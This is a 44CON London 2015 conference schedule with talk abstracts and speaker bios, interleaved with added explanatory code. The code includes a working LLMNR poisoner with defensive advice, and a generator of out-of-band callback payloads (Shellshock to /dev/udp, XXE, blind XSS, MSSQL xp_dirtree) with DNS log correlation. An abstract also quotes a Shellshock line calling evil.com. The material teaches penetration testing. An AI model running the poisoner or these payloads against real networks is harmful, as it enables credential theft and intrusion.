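        print(f"ESTABLISHED {s.local_ip}:{s.local_port} <-> {s.remote_ip}:{s.remote_port} uid={s.uid}")
```

On the sample, port 4444 shows up as a listener not in the allowlist, owned by a web-server uid and with an established session from outside the network; the inode then points at the owning process in the shipped `ls -l /proc/*/fd` listing. IPv6 sockets live in /proc/net/tcp6 with 128-bit addresses printed in four little-endian words, so they need a separate decoder.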

10:30 BST

Break
Friday September 11, 2015 10:30 - 11:29 BST
Track 1

11:30 BST

Going AUTH the Rails on a Crazy Train
Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.

Speakers
Jeff Jarmoc

Jeff is a Senior Application Security Consultant at NCC Group who has contributed code to the Brakeman Rails Security Scanning tool. He’s perhaps best known in the Rails community for his whitepaper The Anatomy of a Rails Vulnerability in which he deeply explored remote code execution...

Tomek Rabczak

Tomek is an Application Security Consultant at NCC Group with experience in secure web application development, security tool research and development, code review, and penetration testing. Over the past 2 years, he has looked at and assessed the security of some of the largest...


Friday September 11, 2015 11:30 - 12:29 BST
Track 1

11:30 BST

Forging the USB armory
The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, are meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.

Speakers
Andrea Barisani

Andrea Barisani is an internationally recognized security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale...


Friday September 11, 2015 11:30 - 12:29 BST
Track 2

11:30 BST

Hands-on JTAG for fun and root shells
JTAG may be almost 30 years old with little change, but that doesn't mean most people really understand what it does and how. This workshop will start with a brief introduction to what JTAG really is, then quickly dive into some hands-on practice with finding, wiring, and finally exploiting a system via JTAG.
For this UK-themed workshop, we'll target a Raspberry Pi (Cambridge) with an ARM (also Cambridge) microprocessor. In order to interact with the system, we'll use a JTAG interface cable from FTDI (Glasgow). We won't do any hardware modifications, but we will hook up wires in weird and wonderful ways to make the Raspberry Pi do things it otherwise shouldn't.
You will need a computer that can boot a Linux USB drive.
Kits will be available for sale at the registration desk.

Speakers
Joe FitzPatrick

Joe FitzPatrick (@securelyfitz) has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences...


Friday September 11, 2015 11:30 - 13:29 BST
Workshop

12:30 BST

Lunch
Friday September 11, 2015 12:30 - 13:59 BST
Track 1

13:30 BST

Lunch
Friday September 11, 2015 13:30 - 14:29 BST
Workshop

14:00 BST

Windows 10: 2 Steps Forward, 1 Step Back
Windows 10 is shaping up to be one of the most secure consumer operating systems yet; it includes many new security features baked in, such as Control Flow Guard and Credentials Isolation. But new features have a habit of coming with additional bugs, which only serve to reduce the security of the system at the same time.

This presentation will describe a few of the new security features introduced into Windows 10 as well as some of the vulnerabilities I’ve discovered which demonstrate that secure engineering is still very difficult in practice.


Speakers
James

James is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1...


Friday September 11, 2015 14:00 - 14:59 BST
Track 1

14:00 BST

MITMf: Bringing Man-In-The-Middle attacks to the 21st century
Tired of managing countless scripts for automating your Man-In-The-Middle attacks?
Have a cool idea for a MITM attack, but don't want to spend hours writing a script from scratch?
Tired of bashing your head against the wall trying to figure out why Ettercap's filters are not working?
Well look no further!
MITMf combines new and old MITM techniques into a framework! Written in Python, it's built to be extremely extensible and reliable, while updating the current MITM attacks for the 21st century!
Currently the following plugins are available:
  • Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ - Partially bypass HSTS
  • Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
  • BeEFAutorun - Autoruns BeEF modules based on the client's OS or browser type
  • AppCachePoison - Perform app cache poisoning attacks
  • Ferret-NG - Transparently hijacks sessions
  • BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
  • CacheKill - Kills page caching by modifying headers
  • FilePwn - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject - Inject arbitrary content into HTML content
  • BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
  • jskeylogger - Injects a JavaScript keylogger into clients' web pages
  • Replace - Replace arbitrary content in HTML content
  • SMBAuth - Evoke SMB challenge-response auth attempts
  • Upsidedownternet - Flips images 180 degrees

Available on GitHub: https://github.com/byt3bl33d3r/MITMf

Speakers
Marcello Salvati

Slightly paranoid IT security enthusiast/researcher with a pathological addiction to Sherlock Holmes novels, Sushi, Video Games and being in the middle.


Friday September 11, 2015 14:00 - 14:59 BST
Track 2
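An added example of what the Responder plugin listed in the MITMf abstract above does on the wire for LLMNR (RFC 4795); this is illustrative code, not MITMf's or Responder's implementation. A Windows host that cannot resolve a name through DNS falls back to multicasting an LLMNR query to 224.0.0.252:5355, anyone on the segment may answer it, and the poisoned answer is what later steers the victim into SMB or HTTP authentication against the attacker's address (the SMBAuth plugin's half of the attack). The message format is DNS-like, so one label encoder serves the query, the answer and the parser used to check the result. The name fileserv, transaction ID 0x1234 and address 10.0.0.66 are constructed.

```python
"""LLMNR query parsing and poisoned-response construction (RFC 4795 wire format).

Added example; not MITMf/Responder code. run_poisoner() needs a real network
segment; everything else works offline on byte strings.
"""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group LLMNR clients query
LLMNR_PORT = 5355
QTYPE_A, QTYPE_ANY = 1, 255


def encode_name(name: str) -> bytes:
    """Dotted name -> length-prefixed labels, zero-terminated (same as DNS)."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def decode_name(data: bytes, offset: int):
    """Decode labels at offset; returns (name, offset just past the name)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointer not expected in this message")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name: str, tid: int, qtype: int = QTYPE_A) -> bytes:
    """What a client multicasts: header (QR=0, one question) + QNAME/QTYPE/QCLASS."""
    return struct.pack("!HHHHHH", tid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes):
    if len(packet) < 12:
        return None
    tid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if flags & 0x8000 or qdcount != 1:  # a response, or not a single question
        return None
    name, off = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": tid, "name": name, "qtype": qtype, "qclass": qclass, "question": packet[12:off + 4]}


def build_poisoned_response(query, answer_ip: str, ttl: int = 30):
    """Echo the question with QR=1 and append one A record pointing at answer_ip."""
    if query["qtype"] not in (QTYPE_A, QTYPE_ANY):
        return None  # don't answer AAAA/PTR; a bogus record type just gets discarded
    header = struct.pack("!HHHHHH", query["id"], 0x8000, 1, 1, 0, 0)
    rr = encode_name(query["name"]) + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + query["question"] + rr


def parse_response(packet: bytes):
    """Check what a victim would see: the answered name, TTL and address."""
    tid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if not flags & 0x8000 or qdcount != 1 or ancount < 1:
        return None
    _qname, off = decode_name(packet, 12)
    off += 4  # skip QTYPE/QCLASS
    rname, off = decode_name(packet, off)
    rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
    off += 10
    ip = socket.inet_ntoa(packet[off:off + rdlen]) if rtype == QTYPE_A and rdlen == 4 else None
    return {"id": tid, "name": rname, "ttl": ttl, "ip": ip}


def run_poisoner(answer_ip: str, ignore_names=()):
    """Join the LLMNR group and answer every A query with answer_ip (unicast back to the querier)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    mreq = struct.pack("4s4s", socket.inet_aton(LLMNR_GROUP), socket.inet_aton("0.0.0.0"))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, src = s.recvfrom(2048)
        q = parse_query(data)
        if not q or q["name"].lower() in ignore_names:
            continue
        resp = build_poisoned_response(q, answer_ip)
        if resp:
            s.sendto(resp, src)


if __name__ == "__main__":
    q = parse_query(build_query("fileserv", 0x1234))
    print(parse_response(build_poisoned_response(q, "10.0.0.66")))
```

The defensive counterpart is as simple as the attack: turn off LLMNR with the "Turn off multicast name resolution" group policy under DNS Client, disable NetBIOS over TCP/IP on the adapters, and alert on LLMNR or NBT-NS answers originating from anything that is not a known server, since a legitimate network should produce almost none.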

14:30 BST

Old Dog, New Tricks: Forensics With PowerShell
Recent intrusions into the networks of organizations like the Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection, but most tools are not up to the job. PowerShell gives defenders the flexibility and in-memory operation needed to tackle live threats.

In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.


Speakers
Jared Atkinson

Jared Atkinson is the Hunt Capability Lead with Veris Group’s Adaptive Threat Division and is an Adjunct Lecturer in Utica College’s M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force...


Friday September 11, 2015 14:30 - 15:59 BST
Workshop

15:00 BST

Responsible disclosure: who cares?
Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action; however, sadly, on most occasions they either feign effort, completely ignore the researcher, or openly say 'go away'. These are a couple of stories of how responsible disclosure was attempted, but the company in question couldn't be troubled to help themselves.

Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other "IoT" style device - completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse'd, their interactions before and after, and the demeanor in which one can conduct oneself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor's CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.

Speakers
OJ Reeves

Founder, Beyond Binary
OJ Reeves is an Australian security professional who specialises in attack simulation. When not breaking networks and software he is actively contributing to the Metasploit framework, with a particular focus on Meterpreter.

Dan Tentler

Dan Tentler is a Co-Founder of Carbon Dynamics, specializing in Attack Simulation. He currently manages the Attack Simulation division of the organization. He shouts on the internet, quite a lot, occasionally talks to the news. Angry old man of the internet.


Friday September 11, 2015 15:00 - 15:59 BST
Track 1

15:00 BST

Hunting Asynchronous Vulnerabilities
In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I'll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQLi, SMTP and even pure XML injection. I'll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.

Speakers
James Kettle

Director of Research, PortSwigger Web Security
James Kettle is Director of Research at PortSwigger Web Security, where he designs and refines vulnerability detection techniques for Burp Suite's scanner. Recent work has focused on using web cache poisoning to turn caches into exploit delivery systems. James has extensive experience...


Friday September 11, 2015 15:00 - 15:59 BST
Track 2
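An added example of the exploit-induced callback workflow the Hunting Asynchronous Vulnerabilities abstract above describes; this is illustrative code, not the speaker's tooling or Burp's. Each injection point gets its own random token embedded in a hostname under a domain whose authoritative DNS you control, so a hit in the resolver's query log identifies the exact request that fired even when it fires hours later from a cron job, and the DNS lookup alone is the signal whether or not the UDP or HTTP connection that follows gets through the egress filter. The payload shapes are the canonical ones for each context; the domain oob.example.net, the tokens and the BIND-style query log lines are constructed for the example.

```python
"""Token-per-injection-point callbacks and log correlation for blind/asynchronous bugs.

Added example, not the speaker's tooling. Assumes you run the authoritative DNS
for CALLBACK_DOMAIN and keep its query log; the domain itself is a placeholder.
"""
import re
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CALLBACK_DOMAIN = "oob.example.net"  # assumed: a zone you are authoritative for

# Payload shapes per context. {host} becomes <token>.CALLBACK_DOMAIN; resolving
# that name is itself the callback, so the connection after it need not succeed.
PAYLOAD_TEMPLATES: Dict[str, str] = {
    # Shellshock: fires when the value reaches a vulnerable bash through the
    # environment, e.g. a CGI handler copying User-Agent (literal braces escaped for format())
    "shellshock": "() {{ :;}}; echo 1 > /dev/udp/{host}/53",
    # external DTD fetch: fires when an XML parser with external entities enabled
    # processes the document, possibly in a queue worker long after the request
    "xxe": '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % p SYSTEM "http://{host}/x.dtd"> %p;]><x/>',
    # blind (DOM) XSS: fires when a stored value is later rendered unescaped, e.g. in an admin UI
    "xss": '"><img src="http://{host}/i">',
    # blind SQL injection on SQL Server: xp_dirtree resolves the UNC host name
    "sqli-mssql": "';exec master..xp_dirtree '\\\\{host}\\x'--",
}


@dataclass
class Probe:
    token: str
    target: str      # where the payload was planted, e.g. "POST /upload (XML body)"
    technique: str
    payload: str


def make_probe(target: str, technique: str, token: Optional[str] = None) -> Probe:
    # 8 hex chars: enough to avoid collisions in one engagement, short enough for length-limited fields
    tok = (token or secrets.token_hex(4)).lower()
    host = f"{tok}.{CALLBACK_DOMAIN}"
    return Probe(tok, target, technique, PAYLOAD_TEMPLATES[technique].format(host=host))


# Match <token>.<domain> anywhere in a log line. Some resolvers randomise the case
# of query names (0x20 encoding), hence re.I and the lower() on the match.
TOKEN_RE = re.compile(r"\b([0-9a-f]{8})\." + re.escape(CALLBACK_DOMAIN) + r"\b", re.I)


def correlate(probes: List[Probe], log_lines: List[str]) -> List[Tuple[Probe, str]]:
    """Return (probe, log line) for every callback that maps to a probe we actually sent."""
    by_token = {p.token: p for p in probes}
    hits = []
    for line in log_lines:
        for m in TOKEN_RE.finditer(line):
            probe = by_token.get(m.group(1).lower())
            if probe:
                hits.append((probe, line))
    return hits


def pending(probes: List[Probe], hits) -> List[Probe]:
    """Probes with no callback yet; not a negative result, because async sinks fire late."""
    seen = {p.token for p, _ in hits}
    return [p for p in probes if p.token not in seen]


# Constructed BIND-style query log: a (case-mangled) hit for the XXE probe, a
# token we never issued, and an unrelated query for the zone.
SAMPLE_QUERY_LOG = [
    "12-Sep-2015 03:14:07.110 client 203.0.113.7#4123: query: DEADBEEF.oob.example.net IN A + (198.51.100.2)",
    "12-Sep-2015 03:14:09.551 client 203.0.113.7#4124: query: cafef00d.oob.example.net IN A + (198.51.100.2)",
    "12-Sep-2015 03:15:00.002 client 192.0.2.9#53001: query: www.oob.example.net IN A + (198.51.100.2)",
]


def demo():
    probes = [
        make_probe("POST /api/import (XML body)", "xxe", token="deadbeef"),
        make_probe("GET /cgi-bin/status (User-Agent)", "shellshock", token="0badf00d"),
        make_probe("POST /profile (display name)", "xss", token="feedface"),
    ]
    hits = correlate(probes, SAMPLE_QUERY_LOG)
    return probes, hits, pending(probes, hits)


if __name__ == "__main__":
    probes, hits, still = demo()
    for probe, line in hits:
        print(f"FIRED  {probe.technique:10} {probe.target}  <- {line}")
    for probe in still:
        print(f"SILENT {probe.technique:10} {probe.target}")
```

Persist the probe table for the life of the engagement and keep re-running the correlation against fresh logs: the whole point of the talk is that the nightly cron job or the admin who opens the report next week is the sink, so the list of silent probes is only a snapshot. The query log also tells you which host resolved the name, which is usually the backend system that is actually vulnerable rather than the web front end you sent the payload to.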

16:00 BST

44CON LONDON 2015 Closing
The closing 30 minutes: giveaways and fun!

Friday September 11, 2015 16:00 - 16:30 BST
Track 1
 